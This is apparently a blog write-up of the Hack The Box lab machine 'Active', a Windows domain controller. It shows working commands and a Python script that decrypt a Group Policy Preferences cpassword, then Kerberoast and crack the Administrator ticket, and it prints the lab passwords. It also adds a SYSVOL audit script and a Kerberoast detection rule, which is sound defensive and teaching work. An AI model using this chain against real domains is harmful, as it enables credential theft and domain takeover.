
Hack The Box Writeup - Active

Active is an easy Windows box. The main objective of this box is to enumerate and exploit several open ports of the target Domain Controller. First, by enumerating the SMB shares, we were able to obtain an interesting file, which led us to valid credentials of a user. These credentials were then used to perform a Kerberoast attack on the target. This gave us access to another, higher-privileged user, which we could use to obtain the root flag.

Enumeration

As always, we start by scanning the target machine’s open ports:

rustscan --ulimit 5000 -a active.htb -- -sV -sC -oN nmap_scan

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2022-04-21 14:31:38Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5722/tcp  open  msrpc         syn-ack Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC
49169/tcp open  msrpc         syn-ack Microsoft Windows RPC
49173/tcp open  msrpc         syn-ack Microsoft Windows RPC
49174/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Here we clearly see that the target machine is a Domain Controller for the domain active.htb. Further, the scan identifies the OS of the DC as Windows Server 2008 R2 SP1.

SMB - TCP 139/445

A quick SMB enumeration revealed an interesting file called Groups.xml.

┌──(kali㉿kali)-[~/HTB/machines/active]
└─$ smbmap -R -H 10.129.130.10 --depth 10

Snippet of the smbmap output showing the file Groups.xml inside the Replication share.

I downloaded the file to further investigate it on my local machine:

smbmap -H 10.129.130.10 --download 'Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml'

I noticed it contained a userName and a cpassword attribute. This sounds promising!

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
        <Properties 
            action="U" 
            newName="" 
            fullName="" 
            description="" 
            cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" 
            changeLogon="0" 
            noChange="1" 
            neverExpires="1" 
            acctDisabled="0" 
            userName="active.htb\SVC_TGS"
        />
    </User>
</Groups>

Group Policy Preferences

A quick Google search showed that this is a well-known configuration file format for Group Policy Preferences (GPP):

When a new GPP is created, there’s an associated XML file created in SYSVOL with the relevant configuration data and if there is a password provided, it is AES-256 bit encrypted which should be good enough… Except at some point prior to 2012, Microsoft published the AES private key on MSDN which can be used to decrypt the password. Since authenticated users (any domain user or users in a trusted domain) have read access to SYSVOL, anyone in the domain can search the SYSVOL share for XML files containing “cpassword” which is the value that contains the AES encrypted password.
(Source: https://adsecurity.org/?p=2288)

So for whatever reason, Microsoft published the AES key that is used to encrypt these passwords (it is documented in the MS-GPPREF specification).

This means we could simply write a short script to decrypt the found password ciphertext using the published key:

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# GPP strips the base64 '=' padding from cpassword, so restore it before decoding
password_hash = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
password_hash += '=' * (-len(password_hash) % 4)
decoded = base64.b64decode(password_hash)

# key known due to microsoft docs https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN
secret_key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
iv = b'\x00' * 16  # MS-GPPREF uses an all-zero IV; pycryptodome needs bytes here, not str
aes = AES.new(secret_key, AES.MODE_CBC, iv)

# the decrypted value is UTF-16-LE text with PKCS#7 padding: strip the padding, then decode
plaintext = unpad(aes.decrypt(decoded), AES.block_size).decode('utf-16-le')

print(f"Plaintext: {plaintext}")

Executing this script, we got the password:

└─$ python3 gpp_decrypt.py
Plaintext: GPPstillStandingStrong2k18
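The script above handles one hard-coded value. From the defender's side the real task is the inverse: sweep SYSVOL for any GPP XML file that still carries a cpassword attribute, since every domain user can read those files. The following is an added audit helper written for this post, not code from the original writeup: it parses the GPP file types that can embed cpassword (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml), reports the affected element and account, and can optionally verify that a value decrypts with the published key. The function and constant names, the sample Groups.xml (built from the one found on this box) and the list of file names are my own; the key and zero IV are the ones from MS-GPPREF.

```python
import base64
import os
import xml.etree.ElementTree as ET

# Published AES-256 key and all-zero IV from MS-GPPREF (same values as the script above)
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_AES_IV = b"\x00" * 16

# GPP file names that may carry a cpassword attribute (assumed list for this example)
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def normalize_cpassword(cpassword):
    """GPP strips base64 '=' padding; restore it so b64decode accepts the value.
    A length of 1 mod 4 can never be valid base64, so the stray character is dropped."""
    if len(cpassword) % 4 == 1:
        cpassword = cpassword[:-1]
    return cpassword + "=" * (-len(cpassword) % 4)


def decrypt_cpassword(cpassword):
    """AES-256-CBC decrypt with the published key; plaintext is UTF-16-LE, PKCS#7 padded.
    pycryptodome is imported lazily so the XML scan itself has no dependency on it."""
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    raw = base64.b64decode(normalize_cpassword(cpassword))
    cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, GPP_AES_IV)
    return unpad(cipher.decrypt(raw), AES.block_size).decode("utf-16-le")


def find_cpassword_entries(xml_data, source="<inline>"):
    """Return one finding per XML element that carries a cpassword attribute.
    The account attribute differs per file type (userName, runAs or accountName)."""
    findings = []
    for elem in ET.fromstring(xml_data).iter():
        if "cpassword" not in elem.attrib:
            continue
        account = (elem.attrib.get("userName") or elem.attrib.get("runAs")
                   or elem.attrib.get("accountName", ""))
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "cpassword": elem.attrib["cpassword"]})
    return findings


def audit_sysvol(sysvol_dir):
    """Walk an exported SYSVOL tree and collect findings from the known GPP file names."""
    findings = []
    for dirpath, _, filenames in os.walk(sysvol_dir):
        for name in filenames:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:      # bytes: let the parser honour the XML encoding
                    findings.extend(find_cpassword_entries(fh.read(), path))
    return findings


# Constructed sample: a trimmed copy of the Groups.xml found on this box, embedded so the
# script runs offline (hypothetical input, not read from a real share here)
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS">
    <Properties action="U" userName="active.htb\\SVC_TGS"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for f in find_cpassword_entries(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: <{f['element']}> account={f['account']} carries a cpassword")
        try:
            print("  value decrypts to:", decrypt_cpassword(f["cpassword"]))
        except ImportError:
            print("  (install pycryptodome to verify that the value decrypts)")
```

Run `audit_sysvol(r"\\dc\SYSVOL\active.htb\Policies")` (or against a local copy of the share) to get the full list; any hit is a policy that should be rebuilt without a stored password, since the KB2962486 patch only stops new cpassword values from being written and leaves existing files in place.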

Initial Foothold

Next, we could access the SMB shares using the obtained password:

┌──(kali㉿kali)-[~/HTB/machines/active]
└─$ smbmap -R -H 10.129.130.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

Apparently, the user SVC_TGS has access to a few additional shares including the Users share. This is also where I found the user.txt file.

Snippet of the smbmap output using the found credentials: We now have access to additional SMB shares!

Privilege Escalation

As we had valid credentials for the user SVC_TGS, we were able to proceed with a Kerberoasting attack. This means we used the credentials of the current user to request service tickets from the KDC for accounts that have a Service Principal Name registered. Each service ticket is encrypted with a key derived from the corresponding service account's password (for RC4 tickets, its NT hash), and the KDC issues it to any authenticated domain user. We can use this condition to take the ticket offline and attempt to crack the service account's password on our local machine.

To obtain the Service Tickets, we can use the tool GetUserSPNs which is part of the Impacket collection.

┌──(kali㉿kali)-[~/HTB/machines/active]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.130.10 -request

The tool found a Service Principal Name registered on the Administrator account, which means the returned ticket is encrypted with the domain administrator's password hash.

Performing a Kerberoast attack on the domain active.htb using Impacket’s GetUserSPNs.py

Next, we used hashcat to crack the hash. The password was quickly found as it was part of the rockyou.txt wordlist.

Hashcat with the mode 13100 (for krb5tgs) and the wordlist rockyou.txt: Password successfully cracked
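The request made above leaves a clear trace on the Domain Controller: every service ticket issued is logged as Security event 4769, and GetUserSPNs.py asks for RC4 tickets (TicketEncryptionType 0x17) for user accounts rather than machine accounts. The following detection logic is an added example written for this post, not something from the original writeup or from Impacket: it scores 4769 records and alerts when one requester collects RC4 tickets for several distinct user-account SPNs inside a short window. The field names follow the 4769 event schema; the events, the threshold, the window and the service names other than Administrator are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"            # TicketEncryptionType for RC4, the type Kerberoast tooling requests
SPN_THRESHOLD = 3            # distinct user-account SPNs per requester before alerting (assumed)
WINDOW = timedelta(minutes=5)  # time window for the count (assumed)

# Constructed 4769 records (not real logs from the box); a subset of the event's fields
SAMPLE_EVENTS = [
    # ordinary traffic: AES ticket for a machine-account service
    {"time": "2022-04-21T14:30:01", "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5", "Status": "0x0"},
    # Kerberoast pattern: one low-privilege user requests RC4 tickets for user-account SPNs
    {"time": "2022-04-21T14:31:38", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"time": "2022-04-21T14:31:39", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"time": "2022-04-21T14:31:40", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    # krbtgt is never counted, even when requested with RC4
    {"time": "2022-04-21T14:31:41", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
]


def is_roastable_request(ev):
    """A successful RC4 TGS request for a user account (machine accounts end in '$')."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC
            and ev["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoast(events, threshold=SPN_THRESHOLD, window=WINDOW):
    """Group qualifying requests by (requester, source IP) and raise one alert per group
    whose distinct service-account count reaches `threshold` within `window`."""
    buckets = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            buckets[key].append((datetime.fromisoformat(ev["time"]), ev["ServiceName"]))

    alerts = []
    for (user, ip), reqs in buckets.items():
        reqs.sort()                                   # oldest first, so each window starts at reqs[i]
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                alerts.append({"requester": user, "source": ip,
                               "services": sorted(services), "first_seen": t0.isoformat()})
                break                                 # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_EVENTS):
        print(f"ALERT {a['requester']} from {a['source']} at {a['first_seen']}: "
              f"RC4 tickets for {', '.join(a['services'])}")
```

The RC4 filter is the strongest signal on a domain where the service accounts support AES: a modern client will negotiate AES, so an RC4 request for a user-account SPN stands out. Tune the threshold against a baseline first, since legacy applications can legitimately request RC4 tickets, and pair the rule with the standard mitigations of long, random service-account passwords (or Group Managed Service Accounts) and removing RC4 from the accounts' supported encryption types.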

Finally, we enumerated the SMB shares once again with the newly obtained credentials.

Snippet of the smbmap output using the found Administrator credentials: We now have access to even more SMB shares!

└─$ smbclient //10.129.130.10/C$ -U active.htb\\administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Proof for rooting the machine

This post is licensed under CC BY 4.0 by the author.